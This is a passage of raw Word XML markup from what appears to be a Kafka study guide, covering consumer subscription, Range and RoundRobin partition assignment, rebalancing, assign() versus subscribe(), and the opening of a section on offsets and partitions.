          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CEE98A9" w14:textId="439BAB5E" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149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830343"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>consumer</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subscribe</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="660066"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Arrays</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>asList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="008800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>"my-topic"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BE0FE9" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="247"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The consumer will then subscribe to the topic and Kafka will handle the partition assignment based on the chosen strategy (either Range or RoundRobin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61753349" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Steps in Partition Assignment Process:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="683D68F5" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer Joins the Group</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16F07F5C" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>When a consumer joins the consumer group, it sends a request to the Kafka broker to fetch the list of partitions for the subscribed topic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2352A5AB" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Partition Assignment Algorithm</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA6245" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Kafka then uses the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assigned strategy</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Range or RoundRobin) to determine how the partitions should be distributed across the consumers in the group.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0788C00B" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Assign Partitions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="243C2AB5" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>The partitions are assigned to the consumers as per the chosen strategy. The Kafka broker sends back the partition assignments to the consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333F2AE3" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rebalancing</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="195D04BC" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="248"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">If a new consumer joins or an existing consumer leaves, Kafka triggers a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>rebalance</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. This involves redistributing the partitions among the available consumers. The rebalance ensures that partitions are still evenly distributed and no partition is left unassigned.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="208B519A" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Summary of Methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BC6485B" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>assign()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Manually assign specific partitions to a consumer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D28282" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="249"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribe()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Kafka automatically handles partition assignment using the selected assignment strategy (Range or RoundRobin).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46E57896" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C4FF7A5" w14:textId="77777777" w:rsidR="004B35F9" w:rsidRPr="00CE4B95" w:rsidRDefault="004B35F9" w:rsidP="004B35F9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Partition assignment in Kafka ensures that partitions are evenly distributed across consumers in a consumer group, which is essential for parallel processing. Kafka uses different strategies, such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Range Assignor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>RoundRobin Assignor</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, to distribute partitions to consumers. The assignment process is automatic by default but can be manually controlled using the assign() method for explicit partition management.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E228574" w14:textId="4315AD16" w:rsidR="0025797A" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0025797A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:pict w14:anchorId="43EBAB41">
          <v:rect id="_x0000_i3079" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="04B0D34F" w14:textId="053DE001" w:rsidR="001D168B" w:rsidRPr="00CE4B95" w:rsidRDefault="001D168B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="767" w:name="_Toc196308247"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is offset and partition in Kafka?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="767"/>
    </w:p>
    <w:p w14:paraId="09F7284E" w14:textId="6A43EF63" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">In </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Apache Kafka</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>offset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> are two critical concepts used to manage and track the flow of messages in Kafka topics. They play a key role in ensuring message delivery and the processing order of messages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0B74F4" w14:textId="77777777" w:rsidR="00A0443E" w:rsidRPr="00CE4B95" w:rsidRDefault="00A0443E" w:rsidP="00A0443E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:ind w:left="360"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="69D1EDFB" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>1. Partition in Kafka:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35A3B87C" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">A </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>partition</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a unit of data storage and message distribution in Kafka. Kafka topics are divided into one or more partitions, which allow Kafka to scale horizontally, providing fault tolerance and parallel processing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64E94203" w14:textId="77777777" w:rsidR="007149D8" w:rsidRPr="00CE4B95" w:rsidRDefault="007149D8" w:rsidP="00A0443E">
      <w:pPr>
        <w:jc w:val="both"/>
